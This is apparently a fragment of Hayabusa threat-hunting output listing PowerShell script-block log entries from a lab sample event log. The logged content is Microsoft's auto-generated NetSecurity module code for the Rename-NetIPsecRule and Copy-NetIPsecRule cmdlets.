'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = 
$PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] 
[Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"yBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 
'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact 
($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, 
$__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' -Alias '*' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 